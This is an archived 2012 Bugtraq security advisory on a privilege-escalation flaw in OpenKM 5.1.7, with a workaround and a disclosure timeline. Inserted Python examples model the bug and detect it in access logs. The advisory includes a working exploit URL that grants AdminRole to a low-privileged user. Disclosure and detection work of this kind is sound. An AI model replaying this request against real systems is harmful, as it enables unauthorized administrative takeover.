Message-ID: <4B70B66DA655F144855183C68062EE89C6A2E0@trexchange.csnc.ch>
Date: Tue, 3 Jan 2012 13:47:39 +0100
From: "Cyrill Brunschwiler" <cyrill.brunschwiler@...c.ch>
To: <bugtraq@...urityfocus.com>
Subject: OpenKM 5.1.7 Privilege Escalation

########################################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
########################################################################
#
# ID:      COMPASS-2012-001
# Product: OpenKM Document Management System 5.1.7 [1]
# Vendor:  OpenKM http://www.openkm.com/
# Subject: Privilege Escalation, Improper Access Control
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Cyrill Brunschwiler (cyrill.brunschwiler@...c.ch)
# Date:    August 6th 2011
#
########################################################################

Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network Computing,
Switzerland, discovered an authorization flaw in the OpenKM solution. OpenKM
allows application administrators to manage users and to assign roles.
Unfortunately, a standard user holding only the UserRole can alter the roles
of existing accounts, because OpenKM does not properly check that the caller
has sufficient privileges before applying the change. The changes are applied
even though the OpenKM user interface displays an "insufficient privileges"
message to the unprivileged user.
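The following is an added example, not OpenKM's code, that models the flaw described above: the privilege check only decides which message the interface shows, while the server persists the role change regardless. The role names and the request parameters come from the advisory; the handler names, the in-memory user store and the way parameters are applied are assumptions made for illustration. The hardened handler shows the shape of the fix, enforcing the check before any state change.

```python
# Added example, not OpenKM's code: a minimal model of the flaw where the
# "insufficient privileges" check lives only in the UI layer and the server
# persists the role change anyway. Role names come from the advisory; the
# handler names, parameter handling and in-memory user store are assumptions.
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

ADMIN_ROLE = "AdminRole"
USER_ROLE = "UserRole"


@dataclass
class User:
    name: str
    roles: set = field(default_factory=set)


class PermissionDenied(Exception):
    """Raised by the hardened handler when the caller lacks AdminRole."""


def parse_user_edit(url: str) -> dict:
    """Flatten the query string of a userEdit request into a single-valued dict."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def ui_allows_user_edit(actor: User) -> bool:
    """The only check the vulnerable flow performs: it picks a message for the UI."""
    return ADMIN_ROLE in actor.roles


def apply_role_change(params: dict, users: dict) -> None:
    """Persist usr_roles onto the target account (shared by both handlers)."""
    if params.get("persist") == "true":
        target = users[params["usr_id"]]
        target.roles = {r for r in params.get("usr_roles", "").split(",") if r}


def user_edit_vulnerable(actor: User, params: dict, users: dict) -> str:
    """Pattern of the flaw: the privilege check only selects a message; the
    state change runs regardless of its result."""
    message = "ok" if ui_allows_user_edit(actor) else "insufficient privileges"
    apply_role_change(params, users)
    return message


def user_edit_fixed(actor: User, params: dict, users: dict) -> str:
    """Hardened form: authorization is enforced before any state change."""
    if not ui_allows_user_edit(actor):
        raise PermissionDenied("insufficient privileges")
    apply_role_change(params, users)
    return "ok"


# The request quoted in the advisory, replayed against both handlers.
ADVISORY_URL = ("http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true"
                "&usr_id=usr&usr_active=on&usr_roles=AdminRole")


def demo() -> dict:
    """Run the same request, issued by the UserRole-only account 'usr' against
    its own account, through both handlers and report the resulting roles."""
    params = parse_user_edit(ADVISORY_URL)
    result = {}

    users = {"usr": User("usr", {USER_ROLE})}
    msg = user_edit_vulnerable(users["usr"], params, users)
    result["vulnerable"] = (msg, sorted(users["usr"].roles))

    users = {"usr": User("usr", {USER_ROLE})}
    try:
        user_edit_fixed(users["usr"], params, users)
        msg = "ok"
    except PermissionDenied as exc:
        msg = str(exc)
    result["fixed"] = (msg, sorted(users["usr"].roles))
    return result


if __name__ == "__main__":
    for handler, (msg, roles) in demo().items():
        print(f"{handler:10s} message={msg!r:28s} roles={roles}")
```

The vulnerable handler returns the same "insufficient privileges" message the advisory mentions, yet the target account ends up holding AdminRole; the fixed handler refuses before `apply_role_change` runs, so the roles are unchanged. The general lesson is that a message or a hidden menu item is not an access control: the check must gate the write itself.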

Vulnerable:
-----------
OpenKM version 5.1.7

Not vulnerable:
---------------
OpenKM version 5.1.8

Workaround:
-----------
Grant access to the /OpenKM/admin path to specific IPs only (requires an
additional WAF or reverse proxy setup [2], or a web server IP restriction).

Exploit:
--------
Log in as a low-privileged user (having the UserRole) and call the following
URL to gain administrative privileges.

http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true&usr_id=usr&usr_active=on&usr_roles=AdminRole
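As an added example serving both the workaround and the exploit sections above (not part of the original advisory), the scanner below reads web server access log lines and flags userEdit requests to the /OpenKM/admin/Auth path that grant AdminRole, as well as any persisted admin-path edit that did not originate from the allowlisted administrator networks the workaround relies on. The log lines, the Apache "combined"-style format, the allowlist and the field names are constructed for this example.

```python
# Added example, not OpenKM's code: detection logic over constructed access
# log lines. It flags persisted userEdit requests to the admin path that grant
# AdminRole, and persisted edits arriving from outside an assumed admin
# allowlist (the IP restriction the advisory's workaround describes).
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, urlsplit

ADMIN_PATH = "/OpenKM/admin/Auth"
ADMIN_NETS = [ip_network("192.168.1.0/24")]  # assumed administrator allowlist

# Apache "combined"-style line: ip ident user [ts] "METHOD target proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic; not real log data.
SAMPLE_LOG = """\
10.0.5.23 - - [03/Jan/2012:13:40:01 +0100] "GET /OpenKM/frontend/index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.5.23 - - [03/Jan/2012:13:41:12 +0100] "GET /OpenKM/admin/Auth?action=userEdit&persist=true&usr_id=usr&usr_active=on&usr_roles=AdminRole HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.1.10 - - [03/Jan/2012:13:42:55 +0100] "GET /OpenKM/admin/Auth?action=userList HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.10 - - [03/Jan/2012:13:43:30 +0100] "POST /OpenKM/admin/Auth?action=userEdit&persist=true&usr_id=bob&usr_roles=UserRole HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Split one log line into its fields plus the decoded path and query."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def from_admin_net(ip: str, nets=ADMIN_NETS) -> bool:
    """True when the client address falls inside one of the allowlisted networks."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in nets)


def inspect(rec: dict, nets=ADMIN_NETS) -> list:
    """Return the reasons this request deserves an analyst's attention."""
    reasons = []
    if rec["path"] != ADMIN_PATH or rec["query"].get("action") != "userEdit":
        return reasons
    if rec["query"].get("persist") != "true":
        return reasons  # form display only, nothing is written
    roles = rec["query"].get("usr_roles", "").split(",")
    if "AdminRole" in roles:
        reasons.append("grants AdminRole")
    if not from_admin_net(rec["ip"], nets):
        reasons.append("admin path reached from outside allowlist")
    return reasons


def scan(log_text: str, nets=ADMIN_NETS) -> list:
    """Scan a block of log text and collect one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect(rec, nets)
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "usr_id": rec["query"].get("usr_id"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} usr_id={f['usr_id']}: {'; '.join(f['reasons'])}")
```

On the sample, only the second line is reported: it both grants AdminRole and comes from a non-admin address, while the administrator's own edit from the allowlisted network that assigns UserRole stays quiet. Keeping the AdminRole check separate from the allowlist check means legitimate privilege grants still leave an audit trail even after the IP restriction is in place; on a patched 5.1.8 install the same query is still useful as an audit signal for role changes.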

Timeline:
---------
August 6th, Vulnerability discovered
August 9th, Vendor contacted
August 10th, Vendor notified
December 1st, Patched version released
January 2nd, Advisory released

References:
-----------
[1] OpenKM http://www.openkm.com/
OpenKM is a Free/Libre document management system that provides a web
interface for managing arbitrary files. OpenKM includes a content repository,
Lucene indexing, and jBPM workflow. The OpenKM system was developed using Java
technology.

[2] Open Source Web Entry Server
Talk at OWASP AppSec Washington D.C. in November 2010 about setting up an
Apache based Open Source Web Entry Server
https://www.owasp.org/images/f/f4/AppSecDC_Open_Source_Web_Entry_Server_V2.2.ppt
